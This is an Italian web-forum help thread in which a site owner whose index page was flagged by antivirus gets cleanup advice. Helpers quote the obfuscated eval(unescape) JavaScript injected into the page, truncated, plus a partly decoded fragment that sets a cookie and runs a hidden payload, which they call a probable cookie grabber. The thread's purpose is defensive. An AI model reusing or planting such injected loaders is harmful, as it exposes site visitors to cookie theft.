[risolto] URGENTE: Virus inspiegabile sul mio sito.

Ciao a tutti, oggi su un forum, mi hanno scritto dicendomi che avast ha rilevato un virus nel mio sito www.badbrizio.altervista.org.
Dice che unp208489284 è infettato dal virus vbs:malware-gen.

Cos'è successo?
C'è un modo per fare una scansione?
Ho notato che non compare più il contatore shinystat e ho visto che shynistat.com è offline, dipende da quello?

GRAZIE

P.S:Plz aiutatemi è urgente

[dapeco]

Elimina dalle pagine il javascript presente al fondo

Codice:

<script language="javascript">$="%64d%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2 [...cut...] eval(unescape($));document.write($);</script>

Cambia la password all'indirizzo di posta utilizzato nel tuo profilo, poi esegui un reset della password dell'account di AV ed una scansione del tuo sistema. Se utilizzi applicazioni (forum, blog, cms) sull'account controlla che siano aggiornate.

Quindi qualcuno ha inserito quella riga di codice volontariamente? E' quello il virus?

[dapeco]

Probabilmente sì. Anzi mi par proprio di sì.

Ho controllato, è solo nell'index, ho cambiato la password a hotmail (indirizzo email che uso) e all'accesso di altervista, quando dicevi blog forum ... a cosa ti riferivi? sul sito non ho niente del genere.
Devo fare qualcos'altro?
Cmq sapresti dirmi cosa fa quello script? Dopo aver cambiato le pass mi sono riconnesso, aiuto non so che fare
EDIT: Ho cancellato tutto il contentuto del sito, ricontrollo le pagine erimetto online

[darkwolf]

Ho ottenuto poco ma alcune parti sembrano interessanti...

Codice:

....
;if (document.cookie.indexOf('vbulletin_multiquote=')==-1){sc('vbulletin_multiquote=',2,7);eval(unescape(dz+cz+op+st)+'dw(dz+cz($+st));')}else{$=''};function sc(cnm,v,ed){var exd=new Date();exd.setDate(exd.getDate()+ed);document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();};";eval(unescape($));document.write($);

[dapeco]

Già parrebbe un cookies grabber o simile.

Ho controllato, è solo nell'index, ho cambiato la password a hotmail (indirizzo email che uso) e all'accesso di altervista, quando dicevi blog forum ... a cosa ti riferivi? sul sito non ho niente del genere.
Devo fare qualcos'altro?
Cmq sapresti dirmi cosa fa quello script? Dopo aver cambiato le pass mi sono riconnesso, aiuto non so che fare
EDIT: Ho cancellato tutto il contentuto del sito, ricontrollo le pagine erimetto online

Allora? devo fare qualcos'altro? Ricambiare le pass o cose del genere, plz rispondete al mex quotato

Grazie e vi chiedo scusa se insisto ma mi sto letteralmente cag##do sotto

[Ospite]

nn ti conviene utilizzare hotmail come indirizzo e-mail per il sito.....
ultimamente sembra che qualcuno sia in grado di trovare le password di hotmail.

nn ci vuole nulla a fare "recupero password" e poi sfruttare il tuo indirizzo e-mail per ottenerla e poi cambiarla.

[darkwolf]

Già parrebbe un cookies grabber o simile.

Infatti...
Purtroppo l'unico riferimento trovato è in una lingua a me incomprensibile....
Link anonimizzato e filtrato da googlecache

[Ospite]

ho trovato questo...
vedi se fa al caso tuo......
http://forum.aiutamici.com/Default.aspx?g=posts&t=48991

ho trovato questo...
vedi se fa al caso tuo......
http://forum.aiutamici.com/Default.aspx?g=posts&t=48991

Grazie matt ho usato housecall.